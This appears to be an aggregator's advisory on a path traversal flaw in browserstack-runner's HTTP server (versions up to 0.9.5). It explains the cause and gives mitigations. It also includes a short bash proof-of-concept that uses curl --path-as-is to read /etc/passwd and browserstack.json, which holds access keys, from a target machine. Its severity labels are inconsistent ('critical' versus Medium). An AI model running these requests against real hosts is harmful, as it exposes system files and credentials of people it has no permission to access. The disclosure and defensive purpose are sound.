Listen to this Post
The HTTP server in browserstack-runner up to version 0.9.5 contains a critical path traversal vulnerability that allows unauthenticated network-adjacent attackers to read arbitrary files from the host filesystem. The root cause lies in the `_default` request handler defined in lib/server.js. When a request is received, the handler extracts the URI pathname using `url.parse(request.url).pathname` and passes it directly to path.join(process.cwd(), uri). The `path.join()` function resolves `../` sequences, effectively allowing an attacker to navigate outside the intended project root directory. Because the server is bound to `0.0.0.0` (all network interfaces) by default, it is accessible to anyone on the same network segment. Furthermore, the handler performs no authentication or authorization checks before serving the requested file. The combination of these factors means an attacker can construct a crafted URL containing `../` sequences to read sensitive files such as /etc/passwd, project source code, or the `browserstack.json` configuration file, which typically contains BrowserStack access keys in cleartext.
DailyCVE Form:
Platform: Node.js module Version: <=0.9.5 Vulnerability: Path Traversal Severity: Medium date: 2026-06-03 Prediction: 2026-06-24
What Undercode Say:
Check if browserstack-runner is installed npm list -g browserstack-runner
Create a vulnerable configuration file
echo '{"username":"your_username","key":"your_key","test_path":"poc.html","test_framework":"qunit","browsers":[]}' > browserstack.json
Start the vulnerable server node bin/runner.js
Proof-of-Concept (PoC) exploit script
!/bin/bash
if [ -z "$1" ]; then
echo "Usage: $0 <target_ip>"
exit 1
fi
TARGET=$1
PORT=8888
curl -s --path-as-is "http://${TARGET}:${PORT}/../../../etc/passwd"
curl -s "http://${TARGET}:${PORT}/browserstack.json"
How Exploit:
An attacker on the same local network can send GET requests with `../` sequences to traverse the directory structure. The `–path-as-is` flag in `curl` is required because `curl` normalizes `../` sequences by default. Web browsers or HTTP libraries that do not normalize URL paths can exploit this without special handling.
Protection from this CVE:
- Update: Upgrade to a patched version of `browserstack-runner` (when available).
- Restrict Binding: Ensure the server binds to `127.0.0.1` instead of
0.0.0.0. - Input Validation: Implement path sanitization to prevent directory traversal.
- Authentication: Require authentication for all HTTP handlers.
- Network Segmentation: Isolate development tools from untrusted networks.
Impact:
- Exposure of BrowserStack API keys, leading to account compromise.
- Disclosure of source code and other project files.
- Access to system files, including `/etc/passwd` and
/etc/shadow. - Potential for lateral movement within the local network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
